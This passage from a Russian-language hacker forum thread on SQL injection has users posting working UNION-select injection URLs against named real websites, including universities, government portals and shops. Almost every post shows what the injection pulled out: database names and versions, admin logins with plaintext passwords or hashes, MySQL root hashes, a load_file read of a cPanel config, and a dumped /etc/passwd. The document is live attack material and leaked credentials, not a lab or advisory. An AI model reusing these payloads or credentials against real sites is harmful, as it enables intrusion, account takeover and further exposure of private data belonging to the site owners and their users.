SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    atlantic.edu

    PR: 7

    Code:
    http://www.atlantic.edu/alumni/article.php?id=72+union+Select+1,aes_decrypt(aes_encrypt(concat(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7/*

    Database Version: 4.1.12-log
    Database name: www_alumni_news
    User name: jdagosti@localhost

    reslife.rit.edu

    PR: 6

    Code:
    http://reslife.rit.edu/publications/opendoor/article.php?id=-72+union+select+1,concat(username,0x3a,password),3+from+users--

    Database Version: 5.0.77
    Database name: reslife
    User name: [email protected]
     
    2 people like this.
  2. Metis

    Metis Member

    Joined:
    29 Nov 2008
    Messages:
    11
    Likes Received:
    5
    Reputations:
    10
    http://www.romaniincanada.org/

    http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users-- (Пароли)

    http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users-- (Пользователи)

    admin:ch8920an
    thor:ch8920an


    Database Version : 5.0.75-community-log
    Database name: romaniin_retete
    User Name : romaniin_admin@localhost
     
  3. Metis

    Metis Member

    Joined:
    29 Nov 2008
    Messages:
    11
    Likes Received:
    5
    Reputations:
    10
    http://www.lowcarbrecipes.org/

    http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users-- (Пользователи)

    http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users-- (Пароли)

    admin:8624266

    Database Version : 5.0.67-community
    Database name : recipedb
    User Name : root@localhost
     
    3 people like this.
  4. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Европа Плюс - Ваше любимое радио!

    Code:
    http://europaplus72.ru/index.php?go=full_afisha&id=-24+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6--
    user(): [email protected]
    database(): srv11964_erp
    version(): 5.0.75-log

    PR=3




    FARM.RU :: Канцелярские и офисные товары

    Code:
    http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
    user(): [email protected]
    database(): farm
    version(): 4.0.27-log


    тИЦ=275
    PR=4


    table users

    Code:
    http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users+limit+0,1--
    login:рassword

    PHP:
    Катерина:ubrfkuaf
    IgorDorohov
    :Dorohov_pas
    lyumna
    :p8yYpn
    тринадцатый
    :6kr176e8
    sm
    :12139



    MRC-modélisme

    Code:
    http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    user(): [email protected]
    database(): mrcmodelismecom
    version(): 5.0.45-Debian_1ubuntu3.3-log

    PR=3

    Code:
    http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables+limit+0,1--
    читаем таблицы.




    ezo.hu - Főoldal

    Code:
    http://www.ezo.hu/index.php?id=24+and+substring(version(),1,1)=5--
    5 ветка

    PR=4




    Официальный сайт института цитологии и генетики СО РАН

    Code:
    http://www.bionet.nsc.ru/cgi-bin/boardicg/catalog.pl?id=24+and+substring(version(),1,1)=5/*
    5 ветка

    тИЦ=1000
    PR=5
     
    #8484 z00MAN, 24 Mar 2009
    Last edited: 24 Mar 2009
    1 person likes this.
  5. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5--
    Database Version : 4.1.22
    Database name : niihim_db
    User name : [email protected]


    админ :

    Code:
    http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,login,password),3,4,5+from+admin--
    Code:
    admin:niihim_w3
    Code:
    http://www.niihim.ru/admin/login.php
     
    3 people like this.
  6. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.webaruhazak.net/cat.php?id=-50+union+select+1,2/*

    Database Version: 4.1.14
    Database name: wscenter
    User name: wscenter@localhost

    2 Metis

    http://www.lowcarbrecipes.org тама и load_file

    cpanel
    http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F6370616E656C2F6370616E656C2E636F6E666967),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7--
     
    #8486 Rubaka, 24 Mar 2009
    Last edited: 24 Mar 2009
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.jcp-pt.org/noticias.php?id=-420+union+select+1,2,3,version(),5,6,7/*&categoria=3&categoria2=0&categoria3=0


    http://www.eduff.uff.br/noticias.php?id=-408+union+select+1,2,3,version()/*
     
  8. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://kvs.gov.ua/info/news/news.php?id=17+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5/*
    version():4.1.22
    database():kvsgov
    user():u_kvsgov@localhost
     
    2 people like this.
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Database Version: 5.0.75-community-log
    Database name: manwomen_propertysalecenter
    User name: manwomen_coy0@localhost
     
    #8489 .:[melkiy]:., 24 Mar 2009
    Last edited: 24 Mar 2009
  10. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    threeoneg.com

    Database Version: 5.0.45
    Database name: threeone_catalog
    User name: threeone_catalog@localhost

    Code:
    http://www.threeoneg.com/31G/shop.php?action=view&id=-17+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9

    ravenfiles.com

    Database Version: 4.1.22-standard
    Database name: rgnmain1_ravenfiles
    User name: rgnmain1_admin@localhost


    Code:
    http://www.ravenfiles.com/file.php?id=-14+union+Select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,0,11
    expovest.ro

    Database Version: 4.1.22-log
    Database name: db16796
    User name: [email protected]

    Code:
    http://www.expovest.ro/general_en/news.php?id=-173+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(user(),0x3a,version(),0x3a,database())

    businessmachine.ro

    Database Version: 5.0.45
    Database name: bm
    User name: bmadm@localhost

    Code:
    http://www.businessmachine.ro/afaceri/news.php?id=-51+union+select+1,concat(username,0x3a,userpass),3,4,5+from+users
    gts-automatizari.ro

    P.S: admin:21232f297a57a5a743894a0e4 (какой тип хэша?)

    Database Version: 5.0.67-community-log
    Database name: gtsautom_web
    User name: gtsautom_web@localhost

    Code:
    http://www.gts-automatizari.ro/industrial-automation/news.php?lg=1&id=-51+union+select+1,2,3,4,concat(user,0x3a,passwd),6,concat(user,0x3a,passwd),8,9,0,1,2,3+from+gts_admin
     
    1 person likes this.
  11. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.mairie-yako.bf/site/suite.php?id=-101+union+select+1,2,version(),table_name,5+from+information_schema.tables--
    Code:
    http://www.lovea2.com/php/tourguide.php?id=-6+union+select+1,version(),3--
     
  12. nazgul_mk

    nazgul_mk New Member

    Joined:
    6 Jul 2008
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    SlavutichCity.net
    PHP:
    http://slavutichcity.net/modules.php?op=modload&name=Subjects&file=index&req=listpages&subid=-1+union+select+1,concat(database(),0x3a,version(),0x3a,user()),3/*
    database(): slavutic_postnuke
    version(): 4.1.22-standard
    user(): slavutic_pnuker@localhost

    ADMIN:
    PHP:
    Boroda:gjhnfk
     
  13. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.globaltown.ru
    PR:1

    Version: 5.0.67
    Code:
    http://www.globaltown.ru/vip.php?id=99999999999999%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
     
    1 person likes this.
  14. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Во как!


    PageRank - 8



    Database Version: 5.0.27-log
    Database name: news_db
    User name: [email protected]






    : localhost : root : *C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
    : 128.146.216.181 : root :*C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
    : 128.146.216.88 : root :*C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
    : % : ted : 625b56912caa4d12 : Y
    : % : ds0migr : 646fe4840b38d1d0 : Y
    : 128.146.% : replication : *CF8D157B64E2424E308A4724ABAECBF189EE1B2D : N



    Читаем etc/passwd






    Code:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    gdm:x:42:42::/var/gdm:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    named:x:25:25:Named:/var/named:/sbin/nologin
    spot:x:500:500:NISS spot account:/home/spot:/bin/bash
    amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
    oracle:x:501:501::/usr/local/oracle:/bin/bash
    mysql:x:101:101::/home/mysql:/bin/bash
    zabbix:x:60:60::/tmp:/sbin/nologin
     
    2 people like this.
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.alternativa3.com/2006/noticias.php?id=-690'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
     
  16. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Интернет-магазин светильников

    Database Version: 4.1.11-Debian_4sarge5-log
    Database name: z34890_isvet
    User name: [email protected]

    Login: silsergey
    Pass: 8e4e4aae7d65051f3424b4fba909a00f : cgiperl
     
    1 person likes this.
  17. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    2
    Likes Received:
    8
    Reputations:
    1
    PR: 6
    тИЦ: 850
    Code:
    http://yspu.yar.ru/service/dissert/?_mode=3&idDis=-1+UNION+SELECT+1,2,convert(concat_ws(0x3a,+user(),+version(),+database())+using+cp1251),4,5,6,7,8,9,10,11,12,13,14/*
    User name: dissert@localhost
    Database version: 4.1.14-log
    Database name: Dissert
     
    #8497 Driver, 25 Mar 2009
    Last edited: 25 Mar 2009
  18. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    PR - 6



    Version : Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
    Dec 17 2002 14:22:05
    Copyright (c) 1988-2003 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


    Db Name : WebDB


    Current User : phpuser
     
  19. Driver

    Driver Member

    Joined:
    5 Jul 2006
    Messages:
    2
    Likes Received:
    8
    Reputations:
    1
    Code:
    http://www.bspu.ru/index.php?module=Topics&func=view&topicid=-1+UNION+SELECT+1,pn_uname,pn_email,4,5,pn_pass+from+md_users+limit+1,1/*
    Database version: 4.0.27-standard-log
    Database name: bspu
    User name: bspu@localhost
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.disco.bg/designs/classic2_en.php?id=-192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,concat_ws(0x3a,version(),database(),user()),68,69,70,71--



    Database Version: 5.0.67-community-log
    Database name: discobg_disco
    User name: discobg_site2@localhost



    http://www.invitro-marketing.com/projects_details.php?id=-32+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user())&start=0&client=&type=-1&type_service=-1


    Database Version: 5.0.67-community
    Database name: invitro_Invitro
    User name: invitro_site@localhost
     
    #8500 Gorev, 26 Mar 2009
    Last edited: 26 Mar 2009
Thread Status:
Not open for further replies.